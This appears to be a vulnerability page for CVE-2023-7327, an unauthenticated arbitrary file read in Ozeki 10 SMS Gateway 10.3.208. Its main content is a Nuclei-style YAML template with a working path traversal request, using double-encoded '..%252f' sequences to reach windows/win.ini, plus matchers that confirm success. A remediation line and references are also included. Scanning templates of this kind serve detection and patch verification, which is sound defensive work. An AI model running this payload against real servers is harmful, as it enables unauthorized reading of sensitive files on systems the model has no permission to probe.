CVE-2023-7327: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read

2026-06-17 Ozeki 10 SMS Gateway PoC Public

Description

An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application.

PoC

id: CVE-2023-7327

info:
  name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read
  author: r3Y3r53
  severity: high
  description: |
    An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application.
  impact: |
    Unauthenticated attackers can read arbitrary files, leading to sensitive information disclosure.
  remediation: |
    Update to the latest version of Ozeki SMS Gateway.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7327
    - https://www.exploit-db.com/exploits/51646
    - https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
  classification:
    cve-id: CVE-2023-7327
    epss-score: 0.02111
    epss-percentile: 0.80868
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,ozeki,lfi,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/octet-stream") && contains(body, "Mail") && contains(body, "files")'
        condition: and
# digest: 4b0a0048304602210091bccfc0a6a4d5a1ca094c96db42edcbdcc71a0d52ffdbc4d3c5c37fca0b86f2022100db42244e1f25c452ce34c10b3ffe5c0da83ec15a9314cf23c5ce478b13a443f2:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities